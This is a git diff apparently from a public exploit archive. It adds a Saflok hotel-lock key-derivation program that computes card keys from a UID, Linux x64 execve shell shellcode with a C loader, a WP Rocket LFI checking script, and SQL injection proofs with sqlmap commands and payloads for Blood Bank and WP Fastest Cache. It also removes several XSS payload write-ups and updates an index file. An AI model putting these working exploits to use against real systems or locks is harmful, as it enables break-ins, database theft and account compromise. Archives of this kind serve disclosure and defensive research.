diff --git a/exploits/hardware/local/51832.c b/exploits/hardware/local/51832.c
new file mode 100644
index 000000000..4e6b96cac
--- /dev/null
+++ b/exploits/hardware/local/51832.c
@@ -0,0 +1,63 @@
+// Exploit Title: Saflok KDF
+// Date: 2023-10-29
+// Exploit Author: a51199deefa2c2520cea24f746d899ce
+// Vendor Homepage: https://www.dormakaba.com/
+// Version: System 6000
+// Tested on: Dormakaba Saflok cards
+// CVE: N/A
+
+#include <stdio.h>
+#include <stdint.h>
+
+#define MAGIC_TABLE_SIZE 192
+#define KEY_LENGTH 6
+#define UID_LENGTH 4
+
+int main(int argc, char *argv[]) {
+    if (argc != 2) {
+        printf("Usage: %s <32-bit uid value in hexadecimal format>\n", argv[0]);
+        return 1;
+    }
+
+    uint8_t magic_table[MAGIC_TABLE_SIZE] = {
+                    0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xF0, 0x57, 0xB3, 0x9E, 0xE3, 0xD8,
+                    0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x96, 0x9D, 0x95, 0x4A, 0xC1, 0x57,
+                    0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x8F, 0x43, 0x58, 0x0D, 0x2C, 0x9D,
+                    0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xFF, 0xCC, 0xE0, 0x05, 0x0C, 0x43,
+                    0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x34, 0x1B, 0x15, 0xA6, 0x90, 0xCC,
+                    0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x89, 0x58, 0x56, 0x12, 0xE7, 0x1B,
+                    0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xBB, 0x74, 0xB0, 0x95, 0x36, 0x58,
+                    0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xFB, 0x97, 0xF8, 0x4B, 0x5B, 0x74,
+                    0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xC9, 0xD1, 0x88, 0x35, 0x9F, 0x92,
+                    0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x8F, 0x92, 0xE9, 0x7F, 0x58, 0x97,
+                    0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x16, 0x6C, 0xA2, 0xB0, 0x9F, 0xD1,
+                    0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x27, 0xDD, 0x93, 0x10, 0x1C, 0x6C,
+                    0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xDA, 0x3E, 0x3F, 0xD6, 0x49, 0xDD,
+                    0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x58, 0xDD, 0xED, 0x07, 0x8E, 0x3E,
+                    0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x5C, 0xD0, 0x05, 0xCF, 0xD9, 0x07,
+                    0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x11, 0x8D, 0xD0, 0x01, 0x87, 0xD0
+    };
+
+    uint8_t uid[UID_LENGTH];
+    sscanf(argv[1], "%2hhx%2hhx%2hhx%2hhx", &uid[0], &uid[1], &uid[2], &uid[3]);
+
+    uint8_t magic_byte = (uid[3] >> 4) + (uid[2] >> 4) + (uid[0] & 0x0F);
+    uint8_t magickal_index = (magic_byte & 0x0F) * 12 + 11;
+
+    uint8_t key[KEY_LENGTH] = {magic_byte, uid[0], uid[1], uid[2], uid[3], magic_byte};
+    uint8_t carry_sum = 0;
+
+    for (int i = KEY_LENGTH - 1; i >= 0 && magickal_index >= 0; i--, magickal_index--) {
+        uint16_t keysum = key[i] + magic_table[magickal_index];
+        key[i] = (keysum & 0xFF) + carry_sum;
+        carry_sum = keysum >> 8;
+    }
+
+    printf("Generated Key: ");
+    for (int i = 0; i < KEY_LENGTH; i++) {
+        printf("%02X", key[i]);
+    }
+    printf("\n");
+
+    return 0;
+}
\ No newline at end of file
diff --git a/exploits/linux/local/51834.c b/exploits/linux/local/51834.c
new file mode 100644
index 000000000..f52a6077c
--- /dev/null
+++ b/exploits/linux/local/51834.c
@@ -0,0 +1,112 @@
+# Exploit Title: Linux-x64 - create a shell with execve() sending argument using XOR (/bin//sh) [55 bytes]
+
+# Shellcode Author: Alexys (0x177git)
+
+# Tested on: Linux (x86_64)
+
+# Shellcode Description: creating a new process using execve() syscall sending bin//sh as argument | (encrypted using XOR operation was QWORD size (/bin - //sh))
+
+# Blog post: @MoreRubyOfSec (https://t.me/MoreRubyOfSec) on Telegram
+
+# Original code:
+[https://github.com/0x177git/xor-encrypted-execve-sh](https://github.com/0x177git/xor-encrypted-execve-sh/blob/main/execve-xor-encrypted-argv.asm)
+
+---- Assembly code ----
+
+section .text
+
+global _start
+
+_start:
+
+xor eax, eax
+
+xor edx, edx ; clear rdx (argv on execve() protoype)
+
+mov qword [rsp-32], 0x7466684b ;
+
+mov qword [rsp-28],0x60650b1d ; encrypted(/bin//sh) 0x60, 0x65, 0xb, 0x1d, 0x74, 0x66, 0x68, 0x4b
+
+xor qword [rsp-32], 0x1a0f0a64
+
+xor qword [rsp-28], 0x08162432 ; passwd 0x8, 0x16, 0x24, 0x32, 0x1a, 0xf, 0xa, 0x64
+
+lea rdi, [rsp-32]
+
+push rax ; end of string
+
+push rdi ; send string to stack
+
+mov rsi, rsp ; send address of RSP to rsi -> (arg on linux syscall architecture convection) || execve(rsi, rdx)
+
+; call execve()
+
+mov al, 0x3b
+
+syscall
+
+-
+- - - shellcode execution using stack in c (
+
+gcc -z execstack shellcode.c -o shellcode
+
+) ----
+
+/*
+
+"\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x31\xc0\xb0\x3b\x0f\x05"
+
+;
+
+*/
+
+void
+
+main
+
+()
+{
+const
+
+char
+
+shellcode
+
+[]
+
+=
+
+"\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x31\xc0\xb0\x3b\x0f\x05"
+
+;
+
+void
+
+(
+
+*
+
+f
+
+)()
+
+=
+
+(
+
+void
+
+(
+
+*
+
+)())
+
+shellcode
+
+;
+
+f
+
+();
+}
\ No newline at end of file
diff --git a/exploits/php/webapps/51757.txt b/exploits/php/webapps/51757.txt
deleted file mode 100644
index d3582a783..000000000
--- a/exploits/php/webapps/51757.txt
+++ /dev/null
@@ -1,40 +0,0 @@
-# Exploit Title: Academy LMS 6.2 - Reflected XSS
-# Exploit Author: CraCkEr
-# Date: 29/08/2023
-# Vendor: Creativeitem
-# Vendor Homepage: https://creativeitem.com/
-# Software Link: https://demo.creativeitem.com/academy/
-# Tested on: Windows 10 Pro
-# Impact: Manipulate the content of the site
-# CVE: CVE-2023-4973
-# CWE: CWE-79 - CWE-74 - CWE-707
-
-
-## Greetings
-
-The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
-CryptoJob (Twitter) twitter.com/0x0CryptoJob
-
-
-## Description
-
-The attacker can send to victim a link containing a malicious URL in an email or instant message
-can perform a wide variety of actions, such as stealing the victim's session token or login credentials
-
-
-Path: /academy/tutor/filter
-
-GET parameter 'searched_word' is vulnerable to XSS
-GET parameter 'searched_tution_class_type[]' is vulnerable to XSS
-GET parameter 'searched_price_type[]' is vulnerable to XSS
-GET parameter 'searched_duration[]' is vulnerable to XSS
-
-https://website/academy/tutor/filter?searched_word=[XSS]&searched_tution_class_type%5B%5D=[XSS]&price_min=1&price_max=9&searched_price_type%5B%5D=[XSS]&searched_duration%5B%5D=[XSS]
-
-
-XSS Payload:
-
-acoa5"><script>alert(1)</script>dyzs0
-
-
-[-] Done
\ No newline at end of file
diff --git a/exploits/php/webapps/51782.txt b/exploits/php/webapps/51782.txt
deleted file mode 100644
index 9911d9d15..000000000
--- a/exploits/php/webapps/51782.txt
+++ /dev/null
@@ -1,29 +0,0 @@
-## Title: TASKHUB-2.8.8-XSS-Reflected
-## Author: nu11secur1ty
-## Date: 09/22/2023
-## Vendor: https://codecanyon.net/user/infinitietech
-## Software: https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874
-## Reference: https://portswigger.net/web-security/cross-site-scripting
-
-
-## Description:
-The value of the JSON parameter within the project parameter is copied
-into the HTML document as plain text between tags. The payload
-vn5mr<img src=a onerror=alert(1)>i62kl was submitted in the JSON
-parameter within the project parameter. This input was echoed
-unmodified in the application's response. The already authenticated
-(by using a USER ACCOUNT)attacker can get a CSRF token and cookie
-session it depends on the scenarios.
-
-[+]Test exploit:
-surw7%3Cscript%3Ealert(1)%3C%2fscript%3E
-
-## Reproduce:
-[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/infinitietech/TASKHUB-2.8.8)
-
-## Proof and Exploit:
-[href](https://www.nu11secur1ty.com/2023/09/taskhub-288-xss-reflected.html)
-
-System Administrator - Infrastructure Engineer
-Penetration Testing Engineer
-home page: https://www.nu11secur1ty.com/
\ No newline at end of file
diff --git a/exploits/php/webapps/51821.txt b/exploits/php/webapps/51821.txt
deleted file mode 100644
index 76a1711cb..000000000
--- a/exploits/php/webapps/51821.txt
+++ /dev/null
@@ -1,19 +0,0 @@
-# Exploit Title: Moodle 4.3 Reflected XSS
-# Date: 21/10/2023
-# Exploit Author: tmrswrr
-# Vendor Homepage: https://moodle.org/
-# Software Demo: https://school.moodledemo.net/
-# Version: 4.3
-# Tested on: Linux
-
-
-Vulnerability Details
-======================
-
-Steps :
-
-1. Log in to the application with the given credentials > USER: teacher PASS: moodle
-2. Go to this page https://school.moodledemo.net/grade/report/grader/index.php?id=69&searchvalue=
-3. Write this payload in the searchvalue field : "onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"qq9r3
-4. When click this url "https://school.moodledemo.net/grade/report/grader/index.php?id=69&searchvalue=%22onmouseover=%22alert(document.domain)%22style=%22position:absolute;width:100%;height:100%;top:0;left:0;%22qq9r3"
-5. You will be see alert button
\ No newline at end of file
diff --git a/exploits/php/webapps/51830.py b/exploits/php/webapps/51830.py
new file mode 100755
index 000000000..1ebf36344
--- /dev/null
+++ b/exploits/php/webapps/51830.py
@@ -0,0 +1,67 @@
+Paulos Yibelo discovered and reported this Local File Inclusion vulnerability in WordPress WP Rocket Plugin. This could allow a malicious actor to include local files of the target website and show its output onto the screen. Files which store credentials, such as database credentials, could potentially allow complete database takeover depending on the configuration. This vulnerability has been fixed in version 2.10.4.
+
+
+https://patchstack.com/database/vulnerability/wp-rocket/wordpress-wp-rocket-plugin-2-10-3-local-file-inclusion-lfi-vulnerability
+
+
+https://vulners.com/wpvulndb/WPVDB-ID:5484D821-7017-47A8-90D8-7D87CB5E0E50
+
+
+
+
+
+
+Exploit :
+
+#Code By E1.Coders
+
+#Dork : "Powered by WP Rocket" filetype:php intitle:"WP Rocket Configuration" -"in" -"dirlist"
+
+Dork : http://example.com/wp-content/plugins/wp-rocket/inc/functions/min/v2.10.3/min/min.php
+
+
+ 
+
+import requests
+import time
+
+def check_wp_rocket_version(url):
+    version_url = url + "/wp-rocket/css/rocket.css"
+    try:
+        response = requests.get(version_url)
+        version = response.headers["X-Powered-By"]
+        if "WP Rocket/" in version:
+            version = version.split("/")[1]
+            return version
+    except Exception as e:
+        print(f"Error occurred while fetching WP Rocket version: {e}")
+    return None
+
+def test_wp_rocket_lfi_bug(url):
+    lfi_url = url + "/wp-rocket/inc/vendor/composer/installed.json"
+    try:
+        response = requests.get(lfi_url)
+        if response.status_code == 200:
+            return True
+    except Exception as e:
+        print(f"Error occurred while testing LFI: {e}")
+    return False
+
+def main():
+    url = "http://arvatools.com"
+    wp_rocket_version = check_wp_rocket_version(url)
+    if wp_rocket_version:
+        print(f"WP Rocket Version: {wp_rocket_version}")
+        if wp_rocket_version in ["2.10.0", "2.10.1", "2.10.2", "2.10.3"]:
+            result = test_wp_rocket_lfi_bug(url)
+            if result:
+                print("LFI vulnerability found in WP Rocket")
+            else:
+                print("LFI vulnerability not found in WP Rocket")
+        else:
+            print("WP Rocket version is not affected by the LFI bug")
+    else:
+        print("Unable to fetch WP Rocket version")
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/exploits/php/webapps/51831.txt b/exploits/php/webapps/51831.txt
new file mode 100644
index 000000000..41fed63b4
--- /dev/null
+++ b/exploits/php/webapps/51831.txt
@@ -0,0 +1,22 @@
+# Exploit Title:  WordPress Plugin Admin Bar & Dashboard Access Control Version: 1.2.8 - "Dashboard Redirect" field  Stored Cross-Site Scripting (XSS)
+# Google Dork: NA
+# Date: 28/10/2023
+# Exploit Author: Rachit Arora
+# Vendor Homepage:
+# Software Link:  https://wordpress.org/plugins/admin-bar-dashboard-control/
+# Version: 1.2.8
+# Category: Web Application
+# Tested on: Windows
+# CVE : 2023-47184
+
+
+1. Install WordPress (latest)
+
+2. Install and activate Admin Bar & Dashboard Access Control.
+
+3. Navigate to "Admin Bar & Dash"  >> Under Dashboard Access and in the "Dashboard Redirect" enter the payload into the input field.
+
+"onfocusin=alert``+autofocus>
+"onfocusin=alert`document.domain`+autofocus>
+
+4. You will observe that the payload successfully got stored  and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.
\ No newline at end of file
diff --git a/exploits/php/webapps/51833.txt b/exploits/php/webapps/51833.txt
new file mode 100644
index 000000000..07754627f
--- /dev/null
+++ b/exploits/php/webapps/51833.txt
@@ -0,0 +1,174 @@
+# Exploit Title: Blood Bank v1.0 SQL Injection Vulnerability
+# Date: 2023-11-14
+# Exploit Author: Ersin Erenler
+# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code
+# Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip
+# Version: 1.0
+# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0
+# CVE : CVE-2023-46014, CVE-2023-46017, CVE-2023-46018
+
+-------------------------------------------------------------------------------
+
+1. Description:
+
+The lack of proper input validation and sanitization on the 'hemail' and 'hpassword' parameters allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database.
+
+Vulnerable File: /hospitalLogin.php
+
+Parameter Names: hemail, hpassword
+
+2. Proof of Concept:
+----------------------
+
+Execute sqlmap using either the 'hemain' or 'hpassword' parameter to retrieve the current database:
+
+sqlmap -u "http://localhost/bloodbank/file/hospitalLogin.php" --method POST --data "hemail=test@test&hpassword=test&hlogin=Login" -p hemail --risk 3 --level 3 --dbms mysql --batch --current-db
+
+SQLMap Response:
+----------------------
+Parameter: hemail (POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
+    Payload: hemail=test@test' AND 3778=(SELECT (CASE WHEN (3778=3778) THEN 3778 ELSE (SELECT 9754 UNION SELECT 4153) END))-- -&hpassword=test&hlogin=Login
+
+    Type: error-based
+    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: hemail=test@test' OR (SELECT 3342 FROM(SELECT COUNT(*),CONCAT(0x716a7a6b71,(SELECT (ELT(3342=3342,1))),0x7170767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NSQu&hpassword=test&hlogin=Login
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: hemail=test@test' AND (SELECT 5639 FROM (SELECT(SLEEP(5)))ulgW)-- QYnb&hpassword=test&hlogin=Login
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 6 columns
+    Payload: hemail=test@test' UNION ALL SELECT CONCAT(0x716a7a6b71,0x567a4f6f4b556976707668696878754f48514d6e63424a706f70714e6f62684f504a7a565178736a,0x7170767a71),NULL,NULL,NULL,NULL,NULL-- -&hpassword=test&hlogin=Login
+
+
+-------------------------------------------------------------------------------
+
+1. Description:
+
+The lack of proper input validation and sanitization on the 'remail' and 'rpassword' parameters allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database
+
+Vulnerable File: /receiverLogin.php
+
+Parameter Names: remail, rpassword
+
+2. Proof of Concept:
+----------------------
+
+Execute sqlmap using either the 'remail' or 'rpassword' parameter to retrieve the current database:
+
+sqlmap -u "http://localhost/bloodbank/file/receiverLogin.php" --method POST --data "remail=test@test&rpassword=test&rlogin=Login" -p remail --risk 3 --level 5 --dbms mysql --batch --current-db
+
+sqlmap -u "http://localhost/bloodbank/file/hospitalLogin.php" --method POST --data "hemail=test@test&hpassword=test&hlogin=Login" -p rpassword --risk 3 --level 5 --dbms mysql --batch --current-db
+
+SQLMap Response:
+----------------------
+---
+Parameter: remail (POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
+    Payload: remail=test@test' AND 1348=(SELECT (CASE WHEN (1348=1348) THEN 1348 ELSE (SELECT 5898 UNION SELECT 1310) END))-- -&rpassword=test&rlogin=Login
+
+    Type: error-based
+    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: remail=test@test' OR (SELECT 9644 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(9644=9644,1))),0x7178706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HyEh&rpassword=test&rlogin=Login
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: remail=test@test' AND (SELECT 5587 FROM (SELECT(SLEEP(5)))hWQj)-- NUfN&rpassword=test&rlogin=Login
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 7 columns
+    Payload: remail=test@test' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x4e764e5452486270544a6e4c705a79535a667441756d556b416e7961484a534a647542597a61466f,0x7178706271),NULL,NULL,NULL,NULL,NULL-- -&rpassword=test&rlogin=Login
+---
+---
+Parameter: rpassword (POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
+    Payload: remail=test@test&rpassword=test' AND 9149=(SELECT (CASE WHEN (9149=9149) THEN 9149 ELSE (SELECT 9028 UNION SELECT 5274) END))-- -&rlogin=Login
+
+    Type: error-based
+    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: remail=test@test&rpassword=test' OR (SELECT 6087 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(6087=6087,1))),0x7178706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VRqW&rlogin=Login
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: remail=test@test&rpassword=test' AND (SELECT 4449 FROM (SELECT(SLEEP(5)))eegb)-- Cuoy&rlogin=Login
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 7 columns
+    Payload: remail=test@test&rpassword=test' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x6e686d776376736a706f47796d474a736a48566f72625a4e6d537247665a444f684154684b476d62,0x7178706271),NULL,NULL,NULL,NULL,NULL-- -&rlogin=Login
+---
+
+
+-------------------------------------------------------------------------------
+
+# Description:
+
+The lack of proper input validation and sanitization on the 'remail' parameter allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database.
+
+Vulnerable File: /receiverReg.php
+
+Parameter Name: remail
+
+# Proof of Concept:
+----------------------
+
+1. Save the POST request of receiverReg.php to a request.txt file
+
+---
+POST /bloodbank/file/receiverReg.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: multipart/form-data; boundary=---------------------------2653697510272605730288393868
+Content-Length: 877
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/bloodbank/register.php
+Cookie: PHPSESSID=<some-cookie-value>
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+-----------------------------2653697510272605730288393868
+Content-Disposition: form-data; name="rname"
+
+test
+-----------------------------2653697510272605730288393868
+Content-Disposition: form-data; name="rbg"
+
+A+
+-----------------------------2653697510272605730288393868
+Content-Disposition: form-data; name="rcity"
+
+test
+-----------------------------2653697510272605730288393868
+Content-Disposition: form-data; name="rphone"
+
+05555555555
+-----------------------------2653697510272605730288393868
+Content-Disposition: form-data; name="remail"
+
+test@test
+-----------------------------2653697510272605730288393868
+Content-Disposition: form-data; name="rpassword"
+
+test123
+-----------------------------2653697510272605730288393868
+Content-Disposition: form-data; name="rregister"
+
+Register
+-----------------------------2653697510272605730288393868--
+
+---
+
+2. Execute sqlmap using 'remail' parameter to retrieve the current database:
+
+sqlmap -r request.txt -p remail --risk 3 --level 3 --dbms mysql --batch --current-db
\ No newline at end of file
diff --git a/exploits/php/webapps/51835.txt b/exploits/php/webapps/51835.txt
new file mode 100644
index 000000000..5ac48ef24
--- /dev/null
+++ b/exploits/php/webapps/51835.txt
@@ -0,0 +1,48 @@
+# Exploit Title: Unauthenticated SQL Injection in WP Fastest Cache 1.2.2
+# Date: 14.11.2023
+# Exploit Author: Meryem Taşkın
+# Vendor Homepage: https://www.wpfastestcache.com/
+# Software Link: https://wordpress.org/plugins/wp-fastest-cache/
+# Version: WP Fastest Cache 1.2.2
+# Tested on: WP Fastest Cache 1.2.2
+# CVE: CVE-2023-6063
+
+## Description
+An SQL injection vulnerability exists in version 1.2.2 of the WP Fastest Cache plugin, allowing an attacker to trigger SQL queries on the system without authentication.
+
+## Vuln Code
+
+public function is_user_admin(){
+            global $wpdb;
+            foreach ((array)$_COOKIE as $cookie_key => $cookie_value){
+                if(preg_match("/wordpress_logged_in/i", $cookie_key)){
+                    $username = preg_replace("/^([^\|]+)\|.+/", "$1", $cookie_value);
+                    break;
+                }
+            }
+            if(isset($username) && $username){
+                $res = $wpdb->get_var("SELECT `$wpdb->users`.`ID`, `$wpdb->users`.`user_login`, `$wpdb->usermeta`.`meta_key`, `$wpdb->usermeta`.`meta_value`
+                                       FROM `$wpdb->users`
+                                       INNER JOIN `$wpdb->usermeta`
+                                       ON `$wpdb->users`.`user_login` = \"$username\" AND  # $username varible is not escaped vulnerable to SQL injection
+                                       .....
+
+## Exploit
+GET / HTTP/1.1
+Cookie: wordpress_logged_in_1=%22%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29A%29%20AND%20%221%22%3D%221
+Host: meryem.local
+
+## Parameter: Cookie #1* ((custom) HEADER)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: wordpress_logged_in_dsadasdasd=" AND (SELECT 3809 FROM (SELECT(SLEEP(5)))RDVP) AND "HQDg"="HQDg
+---
+
+## References
+- [WPScan Blog Post](https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/)
+- [WPScan Vulnerability](https://wpscan.com/vulnerability/30a74105-8ade-4198-abe2-1c6f2967443e/)
+- [CVE-2023-6063](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6063)
+
+## Credits
+- Original Researcher: Alex Sanford
+- PoC: Meryem Taşkın
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 84e5dc63a..802c8da6d 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -3274,6 +3274,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 9955,exploits/hardware/local/9955.txt,"Overland Guardian OS 5.1.041 - Local Privilege Escalation",2009-10-20,trompele,local,hardware,,2009-10-19,,1,CVE-2009-4607;OSVDB-61789,,,,,
 41745,exploits/hardware/local/41745.txt,"QNAP QTS < 4.2.4 - Domain Privilege Escalation",2017-03-27,"Pasquale Fiorillo",local,hardware,,2017-03-27,2017-03-27,1,CVE-2017-5227;NAS-201703-21,,,,,http://www.ush.it/team/ush/hack-qnap/qnap.txt
 32370,exploits/hardware/local/32370.txt,"Quantum vmPRO 3.1.2 - Local Privilege Escalation",2014-03-19,xistence,local,hardware,,2014-03-19,2014-03-19,0,OSVDB-104664,,,,,
+51832,exploits/hardware/local/51832.c,"Saflok - Key Derication Function Exploit",2024-02-28,planthopper3301,local,hardware,,2024-02-28,2024-02-28,0,,,,,,
 20999,exploits/hardware/local/20999.c,"Samsung ml85p Printer Driver 1.0 - Insecure Temporary File Creation (1)",2001-07-10,"Charles Stevenson",local,hardware,,2001-07-10,2012-09-02,1,CVE-2001-1177;OSVDB-1898,,,,,https://www.securityfocus.com/bid/3008/info
 21000,exploits/hardware/local/21000.sh,"Samsung ml85p Printer Driver 1.0 - Insecure Temporary File Creation (2)",2001-07-10,ml85p,local,hardware,,2001-07-10,2012-09-02,1,CVE-2001-1177;OSVDB-1898,,,,,https://www.securityfocus.com/bid/3008/info
 21001,exploits/hardware/local/21001.txt,"Samsung ml85p Printer Driver 1.0 - Insecure Temporary File Creation (3)",2001-07-10,ml85p,local,hardware,,2001-07-10,2012-09-10,1,CVE-2001-1177;OSVDB-1898,,,,,https://www.securityfocus.com/bid/3008/info
@@ -6801,6 +6802,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 27425,exploits/linux/dos/27425.txt,"Zoo 2.10 - Parse.c Local Buffer Overflow",2006-03-16,"Josh Bressers",dos,linux,,2014-03-12,2014-03-12,0,CVE-2006-1269;OSVDB-23934,,,,,https://www.securityfocus.com/bid/17126/info
 43354,exploits/linux/dos/43354.txt,"Zoom Linux Client 2.0.106600.0904 - Command Injection",2017-12-18,Conviso,dos,linux,,2017-12-18,2017-12-21,1,CVE-2017-15049,,,,,https://raw.githubusercontent.com/convisoappsec/advisories/master/2017/CONVISO-17-003.txt
 43355,exploits/linux/dos/43355.txt,"Zoom Linux Client 2.0.106600.0904 - Stack-Based Buffer Overflow (PoC)",2017-12-18,Conviso,dos,linux,,2017-12-18,2017-12-21,1,CVE-2017-15048,"Buffer Overflow",,,,https://raw.githubusercontent.com/convisoappsec/advisories/master/2017/CONVISO-17-002.txt
+51834,exploits/linux/local/51834.c,"(shellcode) Linux-x64 - create a shell with execve() sending argument using XOR (/bin//sh) [55 bytes]",2024-02-28,"Alexys (0x177git)",local,linux,,2024-02-28,2024-02-28,0,,,,,,
 2492,exploits/linux/local/2492.s,".ELF Binaries - Local Privilege Escalation",2006-10-08,Sha0,local,linux,,2006-10-07,,1,,,,,,
 23634,exploits/linux/local/23634.c,"0verkill 0.16 - Game Client Multiple Local Buffer Overflow Vulnerabilities",2004-02-02,pi3ki31ny,local,linux,,2004-02-02,2016-09-06,1,CVE-2004-0238;OSVDB-6928,,,,,https://www.securityfocus.com/bid/9550/info
 36747,exploits/linux/local/36747.c,"Abrt (Fedora 21) - Race Condition",2015-04-14,"Tavis Ormandy",local,linux,,2015-04-14,2016-10-27,1,CVE-2015-3315;CVE-2015-1862;OSVDB-120804,,,,,
@@ -13363,7 +13365,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 45600,exploits/php/webapps/45600.txt,"Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin)",2018-10-15,"Ihsan Sencan",webapps,php,80,2018-10-15,2018-10-18,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comAcademic_Timetable_Final_Build_v70.zip,
 51654,exploits/php/webapps/51654.txt,"Academy LMS 6.0 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-4119,,,,,
 51702,exploits/php/webapps/51702.txt,"Academy LMS 6.1 - Arbitrary File Upload",2023-09-04,CraCkEr,webapps,php,,2023-09-04,2023-09-04,0,,,,,,
-51757,exploits/php/webapps/51757.txt,"Academy LMS 6.2 - Reflected XSS",2024-01-31,CraCkEr,webapps,php,,2024-01-31,2024-01-31,0,,,,,,
 51758,exploits/php/webapps/51758.txt,"Academy LMS 6.2 - SQL Injection",2024-01-31,CraCkEr,webapps,php,,2024-01-31,2024-01-31,0,,,,,,
 36110,exploits/php/webapps/36110.txt,"ACal 2.2.6 - 'calendar.php' Cross-Site Scripting",2011-09-02,T0xic,webapps,php,,2011-09-02,2015-04-18,1,,,,,http://www.exploit-db.comACal-2.2.6.zip,https://www.securityfocus.com/bid/49442/info
 1763,exploits/php/webapps/1763.txt,"ACal 2.2.6 - 'day.php' Remote File Inclusion",2006-05-07,PiNGuX,webapps,php,,2006-05-06,2015-04-18,1,OSVDB-25340;CVE-2006-2261,,,,http://www.exploit-db.comACal-2.2.6.zip,
@@ -14959,6 +14960,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 28574,exploits/php/webapps/28574.txt,"Blojsom 2.31 - Cross-Site Scripting",2006-09-14,"Avinash Shenoi",webapps,php,,2006-09-14,2013-09-27,1,CVE-2006-4829;OSVDB-28834,,,,,https://www.securityfocus.com/bid/20026/info
 5234,exploits/php/webapps/5234.txt,"Bloo 1.00 - Multiple SQL Injections",2008-03-11,MhZ91,webapps,php,,2008-03-10,2016-11-23,1,OSVDB-42778;CVE-2008-1313,,,,http://www.exploit-db.combloo.v.1.00.tgz,
 50362,exploits/php/webapps/50362.txt,"Blood Bank System 1.0 - Authentication Bypass",2021-10-01,"Nitin Sharma",webapps,php,,2021-10-01,2021-10-28,0,,,,,,
